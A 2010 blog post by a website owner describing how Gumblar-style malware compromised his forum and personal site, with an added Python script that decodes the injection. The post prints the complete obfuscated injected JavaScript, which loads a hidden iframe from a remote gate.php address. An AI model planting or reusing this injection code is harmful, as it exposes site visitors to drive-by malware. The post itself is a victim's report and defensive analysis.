
Saturday, 21 August 2010

My website's been hacked!

I run a forum, www.bvra.org.uk, and a personal site, www.paulregan.co.uk.

Last night someone posted on the forum that Google had flagged the site as dangerous, and a follow-up post said that Kaspersky was reporting a trojan: Trojan.JS.Iframe.nk.

What! My forum? No way... I tried a few things and my AV (McAfee) didn't complain. Odd. I checked the date and time on the files and lo and behold, the index.* (htm, html, php) files had been changed 2 days ago... not by me.


<body><script>
var I={j:{I:{I:'~',l:'.',j:'^'},l:{I:'%',l:218915,j:1154%256},j:{I:1^0,l:55,j:'ijl'}},I:{I:{I:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=I.I.I.I(I.l.I.I('.75.67.67.63.3a.2f.2f.31.31.33.2e.31.31.2e.31.39.34.2e.31.37.37.2f.75.67.71.62.70.66.2f.74.6e.67.72.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.67.72.7a.63.79.6e.67.72.66.61.72.6a.66'));var j=(l)?I.I.I.l():false;return j;}},l:{I:function(){var l=I.I.I.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=I.I.j.j(I.I.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=I.I.j.I(I.I.l.I());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{I:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return I.I.j.I(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{I:{I:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'21',j:'16'},l:{I:'50',l:'85',j:'81'},j:{I:'55',l:'85',j:'57'}}}
I.I.l.j();</script>





That had been added to both the forum and my personal site's index files. A strange file, templatesnews.php, had also been uploaded at the same time.

Anyone know what that code does?
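The injected script is a two-stage decoder for a hidden iframe target: I.l.I.I swaps the dots in that long '.75.67...' string for '%' and unescapes it, I.I.j.I then rotates every letter by 13 places, and I.I.l.j drops the result into an iframe inside a display:none element. The Python below is an added example, not code from the original post; it reproduces those two transforms on the dotted string copied from the script above so the iframe src can be recovered offline, and includes a small helper for reading the '\x69\x66...' property names.

```python
import re
from urllib.parse import unquote

# Copied from the injected script above: the argument I.I.I.j passes to I.l.I.I.
DOTTED = ('.75.67.67.63.3a.2f.2f.31.31.33.2e.31.31.2e.31.39.34.2e.31.37.37.2f.75.67'
          '.71.62.70.66.2f.74.6e.67.72.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.67.72'
          '.7a.63.79.6e.67.72.66.61.72.6a.66')


def dotted_unescape(s: str) -> str:
    """I.l.I.I: replace '.' with '%' and URL-unescape, so '.75' becomes 'u'."""
    return unquote(s.replace('.', '%'))


def rotate_letter(ch: str) -> str:
    """I.I.j.I's per-character formula, reproduced exactly:
    ((c & 223) - 52) % 26 + (c & 32) + 65
    c & 223 clears the case bit, -52 then % 26 shifts 13 places within A..Z,
    and c & 32 puts the original case back: a plain ROT13."""
    c = ord(ch)
    return chr(((c & 223) - 52) % 26 + (c & 32) + 65)


def rotate(s: str) -> str:
    """Apply the rotation only to [A-Za-z], matching the script's regex."""
    return re.sub(r'[A-Za-z]', lambda m: rotate_letter(m.group(0)), s)


def decode_iframe_src(dotted: str) -> str:
    """The full pipeline the script runs before setting iframe.src."""
    return rotate(dotted_unescape(dotted))


def decode_js_hex_escapes(s: str) -> str:
    """Turn JS '\\xNN' escapes (e.g. the obfuscated DOM property names)
    back into readable identifiers such as createElement or iframe."""
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


if __name__ == '__main__':
    print('iframe src:', decode_iframe_src(DOTTED))
    print(decode_js_hex_escapes(r'\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'))
```

The decoded src is an http:// URL on a bare IP address ending in gate.php?shname=templatesnews, which ties the hidden iframe to the templatesnews.php file found uploaded alongside the modified index pages.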

Cleaned the files up and locked FTP, even though I had a stupidly complex password.

I've emailed the hosting company, as I suspected something wider. They got back to me and told me mine were the only sites - look for Gumblar.

Now, last weekend my home PC started to act up: Firefox and Chrome would both crash. Actually, come to think of it, the two sites I always rely on for testing are mine. That explains it! A quick Google and it appears Gumblar can get saved passwords from CoreFTP, which I use; it then inserts code to spread itself.

Bugger, and I work in IT! My machine runs up-to-date AV, anti-spyware, firewall & Windows updates. How the hell did this get in?

Props to virtualnames.co.uk, who quickly restored my site from backups, and I've since disabled FTP and changed the passwords again.


Now to make sure this b'stard thing hasn't infected my since-rebuilt OS.